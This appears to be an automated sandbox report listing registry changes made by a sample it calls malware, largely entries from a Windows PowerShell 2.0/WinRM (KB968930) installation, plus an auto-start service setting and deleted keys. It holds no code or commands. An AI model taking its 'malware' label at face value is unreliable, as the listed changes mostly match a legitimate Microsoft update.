[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"ParameterMessageFile" = "%systemroot%\system32\kernel32.dll"

[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\NumMethods]
"(Default)" = "6"

[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnService" = "RPCSS, HTTP, HTTPFilter"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"TypesSupported" = "7"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}]
"(Default)" = "IWSManEx"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"TSAware" = "1"

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"(Default)" = "Microsoft Windows Remote Shell Host"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"UninstallCommand" = "%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"

[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostModuleName" = "%System%\WindowsPowerShell\v1.0\Microsoft.PowerShell.ConsoleHost.dll"

[HKCR\WSMan.Automation\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"

[HKCR\WSMan.Automation.1\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"

[HKLM\System\CurrentControlSet\Services\WinRM]
"Type" = "32"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\130:aef98\iis]
"PathIISAdmin" = "%System%\inetsrv\iisadmin"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\VersionIndependentProgID]
"(Default)" = "WSMan.Automation"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\System\CurrentControlSet\Services\WinRM]
"DisplayName" = "Windows Remote Management (WS-Management)"

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\130:aef98\iis]
"PathWWWRoot" = "C:\Inetpub\wwwroot"
"PathIISHelp" = "%WinDir%\Help\iishelp"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\0\win32]
"(Default)" = "%System%\WsmAuto.dll"

[HKCR\Microsoft.PowerShellConsole.1]
"EditFlags" = "131072"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstalledDate" = "3/24/2016"
"ReleaseType" = "Software Update"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\130:aef98\iis]
"UpgradeType" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCR\WSMan.InternalAutomation.1\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\130:aef98\iis]
"PathInetsrv" = "%System%\inetsrv"

[HKCR\WSMan.Automation\CurVer]
"(Default)" = "WSMan.Automation.1"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\ProgID]
"(Default)" = "WSMan.InternalAutomation.1"

[HKCR\.ps1xml]
"(Default)" = "Microsoft.PowerShellXmlData.1"

[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\NumMethods]
"(Default)" = "4"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKLM\System\CurrentControlSet\Services\WinRM]
"ImagePath" = "%WinDir%\System32\svchost.exe -k WinRM"

[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.PNF" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"MaxSize" = "15728640"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C1 42 E1 06 8C C2 76 2C 71 10 11 22 CA 06 DB 5F"

[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "PSFactoryBuffer"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "PSFactoryBuffer"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Sources" = "PowerShell"

[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"MaxSize" = "20971520"

[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"ServiceDll" = "%SystemRoot%\system32\WsmSvc.dll"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\1033]
"Install" = "1"

[HKCR\Microsoft.PowerShellScript.1\DefaultIcon]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe,1"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\VersionIndependentProgID]
"(Default)" = "WSMan.InternalAutomation"

[HKCR\Microsoft.PowerShellData.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"

[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"seRVicemAIN" = "ServiceMain"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"TypesSupported" = "7"

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstalledBy" = "%CurrentUserName%"

[HKCR\Microsoft.PowerShellData.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"AppID" = "{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerVersion" = "6.1.29.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayIcon" = "%System%\WindowsPowerShell\v1.0\WTRInstaller.ico"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\.psc1]
"Content Type" = "application/PowerShell"

[HKCR\Microsoft.PowerShellXmlData.1]
"EditFlags" = "131072"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}]
"(Default)" = "WSMan InternalAutomation Class"

[HKCR\Microsoft.PowerShellData.1]
"EditFlags" = "131072"

[HKCR\Microsoft.PowerShellXmlData.1]
"FriendlyTypeName" = "Windows PowerShell XML Document"

[HKLM\System\CurrentControlSet\Services\WinRM]
"ErrorControl" = "1"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"ARPLink" = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}]
"(Default)" = "IWSManResourceLocatorInternal"

[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"AutoBackupLogFiles" = "0"

[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"

[HKCR\WSMan.InternalAutomation\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoRepair" = "1"

[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}]
"(Default)" = "WinRM WMI Provider for User Profile"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"UninstallString" = "%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\WSMan.Automation.1]
"(Default)" = "WSMan Automation Class"

[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"Install" = "1"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"RuntimeVersion" = "v2.0.50727"

[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}]
"(Default)" = "IWSManProvHost"

[HKCR\Microsoft.PowerShellModule.1]
"FriendlyTypeName" = "Windows PowerShell Script Module"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageVersion" = "1.0"

[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"ThreadingModel" = "Both"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"ServerExecutable" = "%System%\winrshost.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayName" = "Windows Management Framework Core"
"InstallDate" = "20160324"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"Publisher" = "Microsoft Corporation"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"AllowProtectedRenames" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"ReleaseType" = "Software Update"

[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\NumMethods]
"(Default)" = "4"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsDelSignature"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}]
"(Default)" = "IWSMan"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PowerShellVersion" = "2.0"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\ProgID]
"(Default)" = "WSMan.Automation.1"

[HKCR\Microsoft.PowerShellScript.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnGroup" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\130:aef98\iis]
"PathIISSamples" = "C:\Inetpub\iissamples"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}]
"(Default)" = "WSMan Automation Class"

[HKCR\Microsoft.PowerShellScript.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"

[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "IHost"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Publisher" = "Microsoft Corporation"

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"

[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"(Default)" = "%System%\wsmplpxy.dll"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ApplicationBase" = "%System%\WindowsPowerShell\v1.0"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerName" = "Update.exe"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"AppID" = "{3feb2f63-0eec-4b96-84ab-da1307e0117c}"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"(Default)" = "Microsoft Windows Remote Shell Host"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageName" = "Windows Management Framework Core"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\Microsoft.PowerShellScript.1]
"FriendlyTypeName" = "Windows PowerShell Script"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\WinRM]
"Description" = "Allows access to management information from local and remote machines."

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}]
"(Default)" = "IWSManSession"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"HelpLink" = "http://go.microsoft.com/fwlink/?LinkID=163790"

[HKCR\WSMan.InternalAutomation.1]
"(Default)" = "WSMan Internal Class"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Type" = "Update"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCR\.psm1]
"(Default)" = "Microsoft.PowerShellModule.1"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\HELPDIR]
"(Default)" = "%System%"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsVerifyHash"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Microsoft.PowerShell]
"ConfigXML" = ""

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsCreateHash"

[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.inf" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"

[HKCR\WSMan.Automation]
"(Default)" = "WSMan Automation Class"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"file" = "%systemroot%\system32\config\EventForwarding-Operational.Evt"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsIsMyFileType"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"URLInfoAbout" = "http://go.microsoft.com/fwlink/?LinkID=163792"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"RegistryLocation" = " HKLM,SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930"

[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\NumMethods]
"(Default)" = "4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"TypesSupported" = "7"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ\Regular]
"Guid" = "24b9a175-8716-40e0-9b2b-785de75b1e67"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"SupportsCompatListeners" = "1"

[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "IShell"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"(Default)" = "%System%\winrmprov.dll"

[HKCR\.ps1]
"(Default)" = "Microsoft.PowerShellScript.1"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"Version" = "1.0"

[HKLM\System\CurrentControlSet\Services\WinRM]
"ObjectName" = "NT AUTHORITY\NetworkService"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"(Default)" = "%System%\winrshost.exe"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"Active" = "1"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"(Default)" = "Microsoft Windows WSMan Provider Host"

[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"PID" = "89383-100-0001260-04309"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostAssemblyName" = "Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"

[HKCR\.psd1]
"(Default)" = "Microsoft.PowerShellData.1"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}]
"(Default)" = "IWSManEnumerator"

[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
"ServicePackCachePath" = "c:\windows\ServicePackFiles\ServicePackCache"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"EventMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"Version" = "1.0"

The following service will be launched automatically at system boot-up:

[HKLM\System\CurrentControlSet\Services\SENS]
"Start" = "2"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\130:aef98]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\130:aef98\iis]

The process mscorsvw.exe:3464 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2C 20 75 4A D7 FD F8 00 1B D1 75 3E E7 01 65 D7"

The process mscorsvw.exe:3456 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\7ac727df\3ef4663b]
"F" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ConfigMask" = "4361"
"DisplayName" = "Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"SIG" = "EC BB F6 79 DE 07 9A 4F A7 CE DF 48 D6 49 CE 93"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"LastModTime" = "8E F1 06 7C 03 86 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\3ef4663b\f\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\7ac727df\3ef4663b]
"F" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"DisplayName" = "Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A AE 27 87 CA 54 D0 88 B2 64 50 F7 9B 9F D7 1E"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "91"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"MVID" = "13 FC 3D AE F5 85 09 8F 11 91 1F 8F 72 AC 1C EA"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\7ac727df\3ef4663b]
"F" = ""

